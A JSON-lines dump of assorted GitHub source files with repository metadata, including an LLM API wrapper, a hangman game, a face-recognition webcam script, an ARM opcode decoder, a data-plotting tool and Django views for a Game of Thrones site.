highest index that is less than or equal to the lower index\n lower_index = 0\n for i in range(len(offsets)):\n if offsets[i] <= log_prob_range[0]:\n lower_index = i\n else:\n break\n\n upper_index = len(offsets)\n for i in range(len(offsets)):\n if offsets[i] >= log_prob_range[1]:\n upper_index = i\n break\n\n return lower_index, upper_index\n\n\nclass GPT_Insert(LLM):\n\n def __init__(self, config, needs_confirmation=False, disable_tqdm=True):\n \"\"\"Initializes the model.\"\"\"\n self.config = config\n self.needs_confirmation = needs_confirmation\n self.disable_tqdm = disable_tqdm\n\n def confirm_cost(self, texts, n, max_tokens):\n total_estimated_cost = 0\n for text in texts:\n total_estimated_cost += gpt_get_estimated_cost(\n self.config, text, max_tokens) * n\n print(f\"Estimated cost: ${total_estimated_cost:.2f}\")\n # Ask the user to confirm in the command line\n if os.getenv(\"LLM_SKIP_CONFIRM\") is None:\n confirm = input(\"Continue? (y/n) \")\n if confirm != 'y':\n raise Exception(\"Aborted.\")\n\n def auto_reduce_n(self, fn, prompt, n):\n \"\"\"Reduces n by half until the function succeeds.\"\"\"\n try:\n return fn(prompt, n)\n except BatchSizeException as e:\n if n == 1:\n raise e\n return self.auto_reduce_n(fn, prompt, n // 2) + self.auto_reduce_n(fn, prompt, n // 2)\n\n def generate_text(self, prompt, n):\n if not isinstance(prompt, list):\n prompt = [prompt]\n if self.needs_confirmation:\n self.confirm_cost(\n prompt, n, self.config['gpt_config']['max_tokens'])\n batch_size = self.config['batch_size']\n assert batch_size == 1\n prompt_batches = [prompt[i:i + batch_size]\n for i in range(0, len(prompt), batch_size)]\n if not self.disable_tqdm:\n print(\n f\"[{self.config['name']}] Generating {len(prompt) * n} completions, split into {len(prompt_batches)} batches of (maximum) size {batch_size * n}\")\n text = []\n for prompt_batch in tqdm(prompt_batches, disable=self.disable_tqdm):\n text += self.auto_reduce_n(self.__generate_text, prompt_batch, n)\n return text\n\n def log_probs(self, text, log_prob_range=None):\n raise NotImplementedError\n\n def __generate_text(self, prompt, n):\n \"\"\"Generates text from the model.\"\"\"\n config = self.config['gpt_config'].copy()\n config['n'] = n\n # Split prompts into prefixes and suffixes with the [APE] token (do not include the [APE] token in the suffix)\n prefix = prompt[0].split('[APE]')[0]\n suffix = prompt[0].split('[APE]')[1]\n response = None\n while response is None:\n try:\n response = openai.Completion.create(\n **config, prompt=prefix, suffix=suffix)\n except Exception as e:\n print(e)\n print('Retrying...')\n time.sleep(5)\n\n # Remove suffix from the generated text\n texts = [response['choices'][i]['text'].replace(suffix, '') for i in range(len(response['choices']))]\n return texts\n\n\ndef gpt_get_estimated_cost(config, prompt, max_tokens):\n \"\"\"Uses the current API costs/1000 tokens to estimate the cost of generating text from the model.\"\"\"\n # Get rid of [APE] token\n prompt = prompt.replace('[APE]', '')\n # Get the number of tokens in the prompt\n n_prompt_tokens = len(prompt) // 4\n # Get the number of tokens in the generated text\n total_tokens = n_prompt_tokens + max_tokens\n engine = config['gpt_config']['model'].split('-')[1]\n costs_per_thousand = gpt_costs_per_thousand\n if engine not in costs_per_thousand:\n # Try as if it is a fine-tuned model\n engine = config['gpt_config']['model'].split(':')[0]\n costs_per_thousand = {\n 'davinci': 0.1200,\n 'curie': 0.0120,\n 'babbage': 0.0024,\n 'ada': 0.0016\n }\n price = costs_per_thousand[engine] * total_tokens / 1000\n return price\n\n\nclass BatchSizeException(Exception):\n pass\n","repo_name":"OpenBMB/BMTools","sub_path":"bmtools/tools/db_diag/utils/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":13906,"program_lang":"python","lang":"en","doc_type":"code","stars":2723,"dataset":"github-code","pt":"68"} +{"seq_id":"23777995784","text":"# -*- coding: utf-8 -*-\n#Fabricio de Lima Ribeiro\n#12/11/2020\n#Jogo da forca\n\nfrom tkinter import *\n\ndef jogar():\n\n\tglobal palavra\n\tpalavra = txt_palavra.get()\n\ttxt_palavra.delete(0, 'end')\n\tglobal tamanho\n\ttamanho = len(palavra)\n\t\n\tglobal label\n\tlabel = {}\n\n\tfor i in range(0, tamanho):\n\t lb = Label(app, text=\" ___ \")\n\t lb.place(x=i*30, y=120)\n\t label[i] = lb\n\n\ndef advinhar():\n\tletra = txt_letra.get()\n\ttxt_letra.delete(0, 'end')\n\n\tfor i in range(0, tamanho):\n\t\tif letra == palavra[i]:\n\t\t\tlabel[i]['text'] = palavra[i]\n\t\n\napp = Tk()\napp.title(\"Jogo da forca\")\napp.geometry(\"500x300\")\n\n#Entra com a palavra\nlb_1 = Label(app, text=\"Entre com a palavra: \")\nlb_1.place(x=5, y=6)\n\ntxt_palavra = Entry(app, bg=\"white\", width=15)\ntxt_palavra.place(x=150, y=7)\n\nbtn_jogar = Button(app, text=\"Jogar\", command=jogar)\nbtn_jogar.place(x=280, y=4)\n\n#Entra com a letra\nlb_3 = Label(app, text=\"Entre com uma letra: \")\nlb_3.place(x=5, y=56)\n\ntxt_letra = Entry(app, bg=\"white\", width=15)\ntxt_letra.place(x=150, y=57)\n\nbtn_letra = Button(app, text=\"advinhar\", command=advinhar)\nbtn_letra.place(x=280, y=54)\n\napp.mainloop()","repo_name":"fabricioitajuba/Python","sub_path":"Jogos/forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2379478993","text":"#!/usr/bin/env python\nfrom typing import List\n\n\ndef startswith(start_match: str, targets: List[str]) -> bool:\n # リスト内要素のstartswith\n for e in targets:\n if e.startswith(start_match):\n return True\n return False\n\n\ndef contains(start_match: str, targets: List[str]) -> bool:\n # リスト内要素のstartswith\n for e in targets:\n if start_match in e:\n return True\n return False\n\n\ndef get_cloth_place(gltf: dict) -> dict:\n \"\"\"\n 服のテクスチャの配置を決める\n :param gltf: glTFオブジェクト(VRM拡張を含む)\n :return: 配置座標と配置サイズ\n \"\"\"\n material_names = [material['name'] for material in gltf['materials']]\n has_tops = contains('_Tops_', material_names)\n has_accessory = contains('_Accessory_', material_names)\n has_shoes = contains('_Shoes_', material_names)\n has_bottom = contains('_Bottoms_', material_names)\n is_skirt = startswith('F00_001_01_Bottoms_', material_names) or startswith('M00_003_01_Bottoms_', material_names)\n\n place = {}\n main = None # 結合先マテリアル\n ox, oy = 0, 0 # オフセット\n\n if has_bottom:\n main = main or '_Bottoms_'\n place['_Bottoms_'] = {'pos': (0, oy), 'size': (1024, 1024)}\n oy = 1024\n if is_skirt:\n place['_Bottoms_']['size'] = (1024, 512)\n oy = 512\n \n if has_shoes:\n main = main or '_Shoes_'\n place['_Shoes_'] = {'pos': (0, oy), 'size': (512, 512)}\n ox = ox + 512\n\n if has_accessory:\n main = main or '_Accessory_' \n place['_Accessory_'] = {'pos': (512, oy), 'size': (512, 512)}\n\n if not main:\n return {} # 素体の場合\n\n return {'main': main, 'place': place}\n","repo_name":"hirune4791dev/VReducer","sub_path":"vrm/placer.py","file_name":"placer.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"41567907350","text":"from abc import ABCMeta\nfrom abc import abstractmethod\nfrom enum import Enum\n\n\n# INTERFACE\n\nclass EdgeClient(object):\n \"\"\"The EdgeClient class is an interface for creating edge client classes.\"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def connect(self):\n \"\"\"Connect to the core.\"\"\"\n raise NotImplementedError('You must define \"connect()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def disconnect(self):\n \"\"\"Disconnect from the core.\"\"\"\n raise NotImplementedError('You must define \"disconnect()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def publish(self, topic, payload, qos):\n \"\"\"Publish a new message to the desired topic with the given quality of\n service.\n\n :param topic: Topic name to publish to.\n :type topic: str\n\n :param payload: Payload to publish (JSON formatted string).\n :type payload: str\n\n :param qos: Quality of Service. Could be \"0\" or \"1\".\n :type qos: int\n \"\"\"\n raise NotImplementedError('You must define \"publish()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def subscribe(self, topic, qos, callback):\n \"\"\"Subscribe to the desired topic with the given quality of service and\n register a callback to handle the published messages.\n\n :param topic: Topic name to publish to.\n :type topic: str\n\n :param qos: Quality of Service. Could be \"0\" or \"1\".\n :type qos: int\n\n :param callback: Function to be called when a new message for the\n subscribed topic comes in.\n \"\"\"\n raise NotImplementedError('You must define \"subscribe()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def unsubscribe(self, topic):\n \"\"\"Unsubscribe from the desired topic.\n\n :param topic: Topic name to unsubscribe from.\n :type topic: str\n \"\"\"\n raise NotImplementedError('You must define \"unsubscribe()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def get_shadow_state(self, callback, timeout_s):\n \"\"\"Get the state of the shadow client.\n\n Retrieve the device shadow JSON document from the cloud by publishing an\n empty JSON document to the corresponding shadow topics.\n\n :param callback: Function to be called when the response for a shadow\n request comes back.\n\n :param timeout_s: Timeout in seconds to perform the request.\n :type timeout_s: int\n \"\"\"\n raise NotImplementedError('You must define \"get_shadow()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def update_shadow_state(self, payload, callback, timeout_s):\n \"\"\"Update the state of the shadow client.\n\n Update the device shadow JSON document string on the cloud by publishing\n the provided JSON document to the corresponding shadow topics.\n\n :param payload: JSON document string used to update the shadow JSON\n document on the cloud.\n :type payload: json\n\n :param callback: Function to be called when the response for a shadow\n request comes back.\n\n :param timeout_s: Timeout in seconds to perform the request.\n :type timeout_s: int\n \"\"\"\n raise NotImplementedError('You must define \"update_shadow()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def delete_shadow_state(self, callback, timeout_s):\n \"\"\"Delete the state of the shadow client.\n \n Delete the device shadow from the cloud by publishing an empty JSON\n document to the corresponding shadow topics.\n\n :param callback: Function to be called when the response for a shadow\n request comes back.\n\n :param timeout_s: Timeout in seconds to perform the request.\n :type timeout_s: int\n \"\"\"\n raise NotImplementedError('You must define \"delete_shadow()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def add_listener(self, listener):\n \"\"\"Add a listener.\n \n :param listener: Listener to be added.\n :type listener: :class:`edge_st_sdk.edge_client.EdgeClientListener`\n \"\"\"\n raise NotImplementedError('You must define \"add_listener()\" to use the '\n '\"EdgeClient\" class.')\n\n @abstractmethod\n def remove_listener(self, listener):\n \"\"\"Remove a listener.\n\n :param listener: Listener to be removed.\n :type listener: :class:`edge_st_sdk.edge_client.EdgeClientListener`\n \"\"\"\n raise NotImplementedError('You must define \"remove_listener()\" to use '\n 'the \"EdgeClient\" class.')\n\n @abstractmethod\n def _update_status(self, new_status):\n \"\"\"Update the status of the client.\n\n :param new_status: New status.\n :type new_status: :class:`edge_st_sdk.edge_client.EdgeClientStatus`\n \"\"\"\n raise NotImplementedError('You must define \"_update_client_status()\" to '\n 'use the \"EdgeClient\" class.')\n\n\nclass EdgeClientStatus(Enum):\n \"\"\"Status of the client.\"\"\"\n\n INIT = 'INIT'\n \"\"\"Dummy initial status.\"\"\"\n\n IDLE = 'IDLE'\n \"\"\"Waiting for a connection and sending advertising data.\"\"\"\n\n CONNECTING = 'CONNECTING'\n \"\"\"Opening a connection with the client.\"\"\"\n\n CONNECTED = 'CONNECTED'\n \"\"\"Connected to the client.\"\"\"\n\n DISCONNECTING = 'DISCONNECTING'\n \"\"\"Closing the connection to the client.\"\"\"\n\n UNREACHABLE = 'UNREACHABLE'\n \"\"\"The client disappeared without first disconnecting.\"\"\"\n\n\n# INTERFACES\n\nclass EdgeClientListener(object):\n \"\"\"Interface used by the :class:`edge_st_sdk.edge_client.EdgeClient` class\n to notify changes of a client's status.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def on_status_change(self, client, new_status, old_status):\n \"\"\"To be called whenever a client changes its status.\n\n :param client: Client that has changed its status.\n :type client: :class:`edge_st_sdk.edge_client.EdgeClient`\n\n :param new_status: New status.\n :type new_status: :class:`edge_st_sdk.edge_client.EdgeClientStatus`\n\n :param old_status: Old status.\n :type old_status: :class:`edge_st_sdk.edge_client.EdgeClientStatus`\n\n :raises NotImplementedError`: if the method has not been implemented.\n \"\"\"\n raise NotImplementedError('You must implement \"on_status_change()\" to '\n 'use the \"EdgeClientListener\" class.')\n","repo_name":"STMicroelectronics/EdgeSTSDK_Python","sub_path":"edge_st_sdk/edge_client.py","file_name":"edge_client.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"5932409474","text":"import cv2\nimport numpy as np\nimport os\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create(radius=1, neighbors=8, grid_x=8, grid_y=8)\nrecognizer.read('trainer/trainer.yml')\n\nfaceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml') # haarcascade_frontalface_default.xml\neyeCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_eye_tree_eyeglasses.xml')\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef face_alignment(img, eye_position1, eye_position2):\n # face alignment based eye position\n #if eye_position1 == None or eye_position2 == None:\n # return -1\n\n if eye_position1[0] < eye_position2[0]:\n left_eye = eye_position1\n right_eye = eye_position2\n else:\n left_eye = eye_position2\n right_eye = eye_position1\n\n # Calculating coordinates of a central points of the rectangles\n left_eye_center = (int(left_eye[0] + (left_eye[2] / 2)), int(left_eye[1] + (left_eye[3] / 2)))\n left_eye_x = left_eye_center[0]\n left_eye_y = left_eye_center[1]\n\n right_eye_center = (int(right_eye[0] + (right_eye[2] / 2)), int(right_eye[1] + (right_eye[3] / 2)))\n right_eye_x = right_eye_center[0]\n right_eye_y = right_eye_center[1]\n\n delta_x = right_eye_x - left_eye_x\n delta_y = right_eye_y - left_eye_y\n\n if delta_x == 0 :\n delta_x = 1\n\n angle = np.arctan(delta_y / delta_x)\n angle = (angle * 180) / np.pi\n\n # Width and height of the image\n h, w = img.shape[:2]\n # Calculating a center point of the image\n # Integer division \"//\"\" ensures that we receive whole numbers\n center = (w // 2, h // 2)\n # Defining a matrix M and calling\n # cv2.getRotationMatrix2D method\n M = cv2.getRotationMatrix2D(center, (angle), 1.0)\n # Applying the rotation to our image using the\n # cv2.warpAffine method\n rotated_img = cv2.warpAffine(img, M, (w, h))\n\n return rotated_img\n\n\n\n\n# iniciate id counter\nid = 0\n\n# names related to ids: example ==> Marcelo: id=1, etc\nnames = ['none', 'mira', 'jihyun', 'inseong', 'hyunbin', 'jiwon', 'obama', 'son', 'jimi']\n\n# Initialize and start realtime video capture\ncam = cv2.VideoCapture(0)\ncam.set(3, 640) # set video widht\ncam.set(4, 480) # set video height\n\n# Define min window size to be recognized as a face\nminW = 0.1 * cam.get(3)\nminH = 0.1 * cam.get(4)\n\nwhile True:\n ret, img = cam.read()\n\n if ret == False:\n continue\n\n #img = cv2.flip(img, -1) # Flip vertically\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.2,\n minNeighbors=5,\n minSize=(int(minW), int(minH)),\n )\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n face_img = gray[y:y + h, x:x + w]\n\n resizedface_img = cv2.resize(face_img, (300, 300))\n eyes = eyeCascade.detectMultiScale(\n resizedface_img,\n scaleFactor=1.1,\n minNeighbors=3\n )\n\n index = 0\n eye_1 = None\n eye_2 = None\n eye_cnt = len(eyes)\n if eye_cnt > 2:\n eye_1 = eyes[0]\n eye_2 = eyes[1]\n # Drawing rectangles around the eyes\n # cv2.rectangle(face_img, (ex, ey), (ex + ew, ey + eh), (0, 0, 255), 3)\n #cv2.imshow('face', face_img)\n rotatedface_img = face_alignment(face_img, eye_1, eye_2)\n rotatedface_img = cv2.resize(rotatedface_img, (200, 200))\n else:\n rotatedface_img = cv2.resize(face_img, (200, 200))\n\n #cv2.imshow('rotated', rotatedface_img)\n #cv2.waitKey()\n\n ###########################################################\n id, confidence = recognizer.predict(rotatedface_img)\n ###########################################################\n\n if confidence < 500:\n confidence = int(100 * (1 - (confidence) / 300))\n\n # If confidence is less them 100 ==> \"0\" : perfect match\n if (confidence > 60):\n id = names[id]\n confidence = \" {0}%\".format(confidence)\n else:\n id = \"unknown\"\n confidence = \" {0}%\".format(confidence)\n\n '''if (confidence < 100):\n id = names[id]\n confidence = \" {0}%\".format(round(100-confidence))\n else:\n id = \"unknown\"\n confidence = \" {0}%\".format(round(100-confidence))'''\n\n cv2.putText(\n img,\n str(id),\n (x + 5, y - 5),\n font,\n 1,\n (255, 255, 255),\n 2\n )\n cv2.putText(\n img,\n str(confidence),\n (x + 5, y + h - 5),\n font,\n 1,\n (255, 255, 0),\n 1\n )\n\n cv2.imshow('camera', img)\n k = cv2.waitKey(10) & 0xff # Press 'ESC' for exiting video\n if k == 27:\n break\n\n# Do a bit of cleanup\nprint(\"\\n [INFO] Exiting Program and cleanup stuff\")\ncam.release()\ncv2.destroyAllWindows()","repo_name":"maira7/openCV_face","sub_path":"face_recg.py","file_name":"face_recg.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38029389815","text":"# https://www.hackerrank.com/challenges/sparse-arrays/problem?isFullScreen=true\n# Difficulty: Medium, Points: 25\n\n# Complexity: Time - O(n) and Space: O(n)\n\ndef matchingStrings(strings, queries):\n freq1 = Counter(strings)\n \n result = [0] * len(queries)\n \n for i, q in enumerate(queries):\n if q in freq1:\n result[i] = freq1[q]\n \n return result\n\n\n\n","repo_name":"HunkWhoCodes/HackerRank-Solutions","sub_path":"DataStructures/Arrays/SparseArrays.py","file_name":"SparseArrays.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17165265622","text":"class Sentence:\n\tdef __init__(self,sen):\n\t\tself.sen=sen\n\tdef reverse(self):\n\t\tword=self.sen.split()\n\t\treverse=\"\"\n\t\tfor i in word:\n\t\t\treverse=i+\" \"+reverse\n\t\treturn reverse\n\tdef vowel(self):\n\t\tcount=0\n\t\tvo=['A','E','I','O','U','a','e','i','o','u']\n\t\tfor i in self.sen:\n\t\t\tif i in vo:\n\t\t\t\tcount=count+1\n\t\treturn count\n\nr1=Sentence(input())\nr2=Sentence(input())\nr3=Sentence(input())\n\nc1=r1.vowel()\nc2=r2.vowel()\nc3=r3.vowel()\n\nworddes={\n\tc1:r1.reverse(),\n\tc2:r2.reverse(),\n\tc3:r3.reverse()\n\t}\n\nfor i in sorted(worddes.keys(), reverse=True):\n\tprint(i,worddes[i])\n\n\t\t\n\t\t\n","repo_name":"aman1698/Semester-5","sub_path":"SEE/6/6b.py","file_name":"6b.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10915849614","text":"from armulator.armv6.bits_ops import substring\nfrom armulator.armv6.opcodes.abstract_opcodes.umaal import Umaal\n\n\nclass UmaalA1(Umaal):\n @staticmethod\n def from_bitarray(instr, processor):\n rn = substring(instr, 3, 0)\n rm = substring(instr, 11, 8)\n rd_lo = substring(instr, 15, 12)\n rd_hi = substring(instr, 19, 16)\n if rd_hi == 15 or rm == 15 or rn == 15 or rd_lo == 15 or (rd_lo == rd_hi):\n print('unpredictable')\n else:\n return UmaalA1(instr, m=rm, d_hi=rd_hi, d_lo=rd_lo, n=rn)\n","repo_name":"matan1008/armulator","sub_path":"armulator/armv6/opcodes/concrete/umaal_a1.py","file_name":"umaal_a1.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"68"} +{"seq_id":"17804135363","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport argparse\nimport io\nimport code\nimport os.path\nimport scipy.optimize\n\nif np.__version__ < '1.14.1':\n sys.exit(\"numpy version \", np.__version__, \"is too old\")\n \ndef open_3d_file(file):\n print(np.__version__)\n fh = open(file, 'r')\n header = fh.readline().rstrip()\n print(\"header: \", header)\n contents = fh.read().rstrip()\n \n list_of_blocks = contents.split(\"\\n\\n\")\n print(\"number of blocks: \", len(list_of_blocks))\n arrays = []\n for block in (list_of_blocks):\n arrays.append(np.genfromtxt(io.StringIO(block)))\n first_shape = arrays[0].shape\n for i in range(len(arrays)-1, -1, -1):\n shape = arrays[i].shape\n if shape != first_shape:\n print(\"block \", i, \" with first line\", arrays[i][0], \" does not match :\", shape, \" != \", first_shape)\n del arrays[i]\n return np.stack(arrays), header\n\ndef closest_index(array, value):\n if len(array.shape) != 1:\n sys.exit(\"argument of closest_index needs dimension 1\")\n \n abs_array = np.abs(array - value)\n index = np.where(abs_array == np.amin(abs_array))\n if len(index) > 1:\n print(\"warning: multiple optimal values in closest_index\")\n index = index[0][0]\n value = array[index]\n return index, value\n\nparser = argparse.ArgumentParser()\n\n# mandatory arguments\nparser.add_argument('filename', help=\"input file\")\nparser.add_argument('OIZ', help=\"outer:inner:zcol description\")\nparser.add_argument('trace', help=\"o=value or i=value\")\n\n# output arguments\nparser.add_argument('-o', '--output', help=\"basename for output data file\")\nparser.add_argument('-f', '--force', action=\"store_true\", help=\"overwrite existing files\")\n\n# commands\nparser.add_argument('-c', '--command', action='append', default=[], help=\" transformation command, see below; can be provided multiple times\")\n\n# plot options\nparser.add_argument('-s', '--save-plot', help='save plot to filename. Suffix determines the format')\nparser.add_argument('--line', action='store_true')\n\n# fit functions\nparser.add_argument('--fit', help=\"fit type: 'linear', 'gaussian', 'lorentzian'\") \n\nargs = parser.parse_args()\nprint(args)\ncols = [int(x)-1 for x in args.OIZ.split(':')]\nif len(cols) != len(set(cols)):\n sys.exit(\"outer, inner, and z columns need to be unique\")\n\no_col, i_col, z_col = cols\ntrace_index, trace_value = args.trace.split('=')\nif trace_index != 'o' and trace_index != 'i':\n sys.exit(\"trace argument need to be o=value or i=value\")\n \ntrace_value = float(trace_value)\n\ndata_3d, header = open_3d_file(args.filename)\ncol_legends = header.split()[1:]\ncol_dict = {}\nprint(\"legends:\", col_legends)\nfor i, val in enumerate(col_legends):\n col_dict[i] = val\n\nprint(\"input data shape: \", data_3d.shape)\n\n# assume regular data: o11 = o12 = o13, ...; i11 = i21 = i31, ...\n\nif trace_index == 'o':\n trace_col = o_col\n o_vals = data_3d[:,0,o_col]\n o_index, value = closest_index(o_vals, trace_value)\n x_col = i_col\n x_vals = data_3d[o_index,:,x_col]\n z_vals = data_3d[o_index,:,z_col]\n \nelif trace_index == 'i':\n trace_col = i_col\n i_vals = data_3d[0, :, i_col]\n i_index, value = closest_index(i_vals, trace_value)\n x_col = o_col\n x_vals = data_3d[:,i_index, x_col]\n z_vals = data_3d[:,i_index, z_col]\n\nx_label = col_dict[x_col]\nz_label = col_dict[z_col]\n\ndef apply_commands(commands, x_vals, z_vals, x_label, z_label):\n for cmd in (commands):\n x_vals, z_vals, x_label, z_label = apply_command(cmd, x_vals, z_vals, x_label,\n z_label)\n return x_vals, z_vals, x_label, z_label\n\ndef apply_command(cmd, x_vals, z_vals, x_label, z_label):\n print(\"apply command\", cmd)\n if cmd in 'abs log log10'.split():\n z_vals = getattr(np, cmd)(z_vals)\n z_label = cmd + '(' + z_label + ')'\n elif cmd.startswith('xmin='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(x_vals < value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('xmax='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(x_vals > value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('zmin='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(z_vals < value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('zmax='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(z_vals > value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('add='):\n tmp,value = cmd.split('=')\n value = float(value)\n z_vals = z_vals + value\n z_label = z_label + (\"%g\" % value)\n elif cmd.startswith('factor='):\n tmp,value = cmd.split('=')\n value = float(value)\n z_vals = value * z_vals\n z_label = (\"%g • \" % value) + z_label\n elif cmd == 'fft':\n z_vals = np.abs(np.fft.rfft(z_vals))\n x_vals = np.fft.rfftfreq(x_vals.shape[0], np.abs(x_vals[1]-x_vals[0]))\n z_label = \"|fft(%s)|\" % z_label\n x_label = \"freq(%s)\" % x_label\n \n else:\n sys.exit(\"unknown command \" + cmd)\n return x_vals, z_vals, x_label, z_label\n \nx_vals, z_vals, x_label, z_label = apply_commands(args.command, x_vals, z_vals,\n x_label, z_label)\n\nif args.output:\n if not args.force and os.path.isfile(args.output):\n sys.exit(\"file %s already exists. Use -f option to overwrite\" % args.output)\n output_block = np.stack([x_vals, z_vals], axis=-1)\n header = \"# %s\\t%s\" % (x_label, z_label)\n np.savetxt(args.output, output_block, fmt=\"%.17g\", header=header, comments='')\n\n\nlinestyle = \"-\" if args.line else \"\"\nplt.plot(x_vals, z_vals, marker=\"x\", linestyle=linestyle, label=\"%s=%g\" %( col_dict[trace_col], value))\n\ndef gaussian(x, *p):\n x0, w, A, a, b = p\n return A * np.exp(-1/2 * ((x-x0)/w)**2) + a*x + b\n\ndef lorentzian(x, *p):\n x0, w, A, a, b = p\n return A /(w**2 + (x-x0)**2) + a*x + b\n\nif args.fit:\n if args.fit == 'linear':\n coeff, V = np.polyfit(x_vals, z_vals, 1, cov=True)\n print(\"coeffs of linear fit: \", coeff)\n p = np.poly1d(coeff)\n cov = np.sqrt(np.diag(V))\n print(\"standard deviations: \", cov)\n label = \"%.3g(±%.2g) • %s %+.3g(±%.2g)\" % (coeff[0], cov[0], col_dict[x_col], coeff[1], cov[1])\n plt.plot(x_vals, p(x_vals), label=label)\n elif args.fit == 'gaussian':\n p0 = [(x_vals[-1] + x_vals[0])/2, 1, 1, 0, 0]\n popt, pcov = scipy.optimize.curve_fit(gaussian, x_vals, z_vals, p0=p0)\n print(\"fit parameters: \", popt)\n z_plot = gaussian(x_vals, *popt)\n label = 'gaussian(x_0 = %.4g, σ = %.3g)' % (popt[0], popt[1])\n plt.plot(x_vals, z_plot, label=label)\n elif args.fit == 'lorentzian':\n p0 = [(x_vals[-1] + x_vals[0])/2, 1, 1, 0, 0]\n popt, pcov = scipy.optimize.curve_fit(lorentzian, x_vals, z_vals, p0=p0)\n print(\"fit parameters: \", popt)\n z_plot = lorentzian(x_vals, *popt)\n label = 'lorentzian(x_0 = %.4g, w = %.3g)' % (popt[0], popt[1])\n plt.plot(x_vals, z_plot, label=label)\n else:\n sys.exit(\"unknown fit command %s\" % args.fit)\nplt.grid()\nplt.xlabel(x_label)\nplt.ylabel(z_label)\nplt.legend()\nplt.ticklabel_format(style='sci', axis='both')\n\nif args.save_plot:\n if not args.force and os.path.isfile(args.save_plot):\n sys.exit(\"file %s already exists. Use -f option to overwrite\" % args.save_plot)\n plt.savefig(args.save_plot, bbox_inches='tight')\nplt.show(block=False)\ncode.interact()\n","repo_name":"amba/plot_munger","sub_path":"plot_trace.py","file_name":"plot_trace.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3627700806","text":"from django.shortcuts import render\nimport cx_Oracle\nfrom django.http import HttpResponse\nfrom .models import House\nfrom .models import Character\nfrom .models import Battle\nimport urllib.request\n\n# Create your views here.\n\ndef index(request):\n\t'''con = cx_Oracle.connect('system/oracle@127.0.0.1:1521/xe')\n\tcur = con.cursor()\n\tcur.execute('SELECT * from battle')\n\tresult = cur.fetchall()\n\treturn HttpResponse(\"Valar Morghulis\")'''\n\tcharacters = Character.objects.all()\n\thouses = House.objects.all()\n\tbattles = Battle.objects.all()\n\t'''for character in characters:\n\t\t_characters.append(character.c_name.replace(' ','_'))'''\n\t'''for character in characters:\n\t\turllib.request.urlretrieve(character.c_image,\"F:\\\\Programs\\\\Python-Programs\\\\Django-programs\\\\GameofThrones\\\\static\\\\GameofThrones\\\\images\\\\House\")'''\n\treturn render(request,'index.html',{'characters':characters,'houses':houses,'battles':battles})\n\ndef house(request,pk):\n\thouse = House.objects.get(pk=pk)\n\t#urllib.request.urlretrieve(house.h_image,\"F:\\\\Programs\\\\Python-Programs\\\\Django-programs\\\\GameofThrones\\\\static\\\\GameofThrones\\\\images\\\\House\")\n\treturn render(request,'house.html',{'house':house})\n\ndef character(request,pk):\n\ttry:\n\t\tcharacter = Character.objects.get(pk=pk)\n\t\t#urllib.request.urlretrieve(character.c_image,\"F:\\\\Programs\\\\Python-Programs\\\\Django-programs\\\\GameofThrones\\\\static\\\\GameofThrones\\\\images\\\\Character\")\n\texcept Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'characters.html',{'character':character})\n\ndef add_character(request):\n\ttry:\n\t\tcharacter = Character.objects.get(pk=1)\n\texcept Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_character.html',{'character':character})\n\ndef new_character(request,pk):\n\ttry:\n\t\tcharacter = Character.objects.get(pk=pk)\n\texcept Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_character.html',{'character':character})\n\ndef delete_character(request):\n\ttry:\n\t\tcharacter = Character.objects.get()\n\texcept 